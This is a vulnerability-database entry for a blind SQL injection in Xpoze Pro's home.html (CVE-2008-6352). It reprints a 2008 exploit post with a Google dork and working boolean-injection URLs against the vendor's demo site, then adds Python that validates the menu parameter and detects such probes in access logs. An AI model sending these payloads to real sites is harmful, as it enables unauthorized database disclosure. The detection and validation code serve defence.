Xpoze 'home.html' SQL Injection Vulnerability

Vulnerability ID: 1117019  Vulnerability type: SQL injection
Published: 2008-12-12  Updated: 2009-03-02
CVE ID: CVE-2008-6352  CNNVD ID: CNNVD-200903-006
Platform: PHP  CVSS score: 7.5
|Sources
https://www.exploit-db.com/exploits/7432
https://cxsecurity.com/issue/WLB-2009030111
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-006
|Vulnerability details
SQL injection vulnerability in home.html in Xpoze Pro 4.10. A remote attacker can execute arbitrary SQL commands via the menu parameter.
|Exploit
[■]  Xpoze Pro  (home menù) <= Blind $ql Injection

 
>---------------------------------------<

> AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> B§g: Blind $ql inJection
> SIte vuln: http://www.xpoze.org/

>---------------------------------------<
 
 
[■] ExPL0iT:
 
Dork: " Powered by Xpoze "

|: http://www.example.com/home.html?menu=[$qL] 


[■] D£M0: 
 
|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=5  [NO°°]
 
|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=4 [y&$ ;-)] 
 

 
[■] Th4nKs::
 
> Str0ke </ >Il pavimento</ >sibilla</ >Lo z00</ >I FoxHound ( goto www.myspace.com/foxhoundindie )

# milw0rm.com [2008-12-12]
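A defender-side view of this bug class, added here as an example; it is not Xpoze code and not part of the advisory above. The `menu` value is expected to be a numeric id, so the first function is the strict whitelist validation that would have stopped the injection before it reached a query. The remaining functions scan access-log lines for the boolean-based probe pattern seen in the demo URLs (`and ... =`, `substring(`, `@@version`) and report source addresses whose true/false probes received responses of different sizes, which is exactly the signal that the page leaks a boolean oracle. The log format (Apache combined), the log lines, the regexes and all function names are constructed assumptions for this example.

```python
"""Detect boolean-based blind SQL injection probes against a numeric query
parameter (here `menu`, as in the Xpoze home.html advisory) in web-server
access logs, and show the input validation that blocks them.

Example code added to this page; not from Xpoze or the advisory author.
The log lines below are constructed, not real traffic.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache combined-log format (assumed format).
SAMPLE_LOG = """\
203.0.113.5 - - [12/Dec/2008:10:00:01 +0000] "GET /home.html?menu=110 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Dec/2008:10:00:02 +0000] "GET /home.html?menu=110%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Dec/2008:10:00:03 +0000] "GET /home.html?menu=110%20and%20substring(@@version,1,1)=4 HTTP/1.1" 200 3980 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Dec/2008:10:00:04 +0000] "GET /home.html?menu=12 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Dec/2008:10:00:05 +0000] "GET /home.html?menu=12+or+1%3D1 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, request target, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+) (?P<size>\S+)'
)

# Boolean-based probe: an AND/OR clause followed by a comparison, or a
# database function / variable reference that has no business in a menu id.
BOOLEAN_PROBE_RE = re.compile(
    r"\b(and|or)\b\s+.*(=|<|>|\blike\b)|\bsubstring\s*\(|@@version",
    re.IGNORECASE,
)


def is_valid_menu(value: str) -> bool:
    """Mitigation side: a menu id is a short string of digits and nothing else.
    Rejecting everything else (or binding it as an integer parameter) removes
    the injection point regardless of what the attacker appends."""
    return value.isdigit() and len(value) <= 9


def classify_menu(value: str) -> str:
    """Detection side: label a decoded menu value."""
    if is_valid_menu(value):
        return "ok"
    if BOOLEAN_PROBE_RE.search(value):
        return "boolean_probe"
    return "malformed"


def scan_log(text: str) -> list:
    """Return one finding per request whose menu parameter is not a plain id."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qs percent-decodes the value and turns '+' into a space.
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for raw in query.get("menu", []):
            verdict = classify_menu(raw)
            if verdict != "ok":
                findings.append({
                    "ip": m["ip"],
                    "menu": raw,
                    "verdict": verdict,
                    "size": int(m["size"]),
                })
    return findings


def oracle_exposed(findings: list) -> list:
    """Blind injection only works if true and false probes render differently.
    Return the source IPs whose boolean probes got responses of differing
    size: evidence that the page is answering the attacker's yes/no questions."""
    sizes = {}
    for f in findings:
        if f["verdict"] == "boolean_probe":
            sizes.setdefault(f["ip"], set()).add(f["size"])
    return sorted(ip for ip, s in sizes.items() if len(s) > 1)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ip']:15} {f['verdict']:14} size={f['size']:5} menu={f['menu']!r}")
    print("boolean oracle exposed to:", oracle_exposed(found))
```

Response size is only a proxy for "rendered differently"; in a real deployment compare a stable feature of the page body, and treat any non-numeric `menu` value as a rejected request rather than one to log and forward.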
|References

Source: BID
Name: 32789
Link: http://www.securityfocus.com/bid/32789
Source: MILW0RM
Name: 7432
Link: http://www.milw0rm.com/exploits/7432
Source: SECUNIA
Name: 33126
Link: http://secunia.com/advisories/33126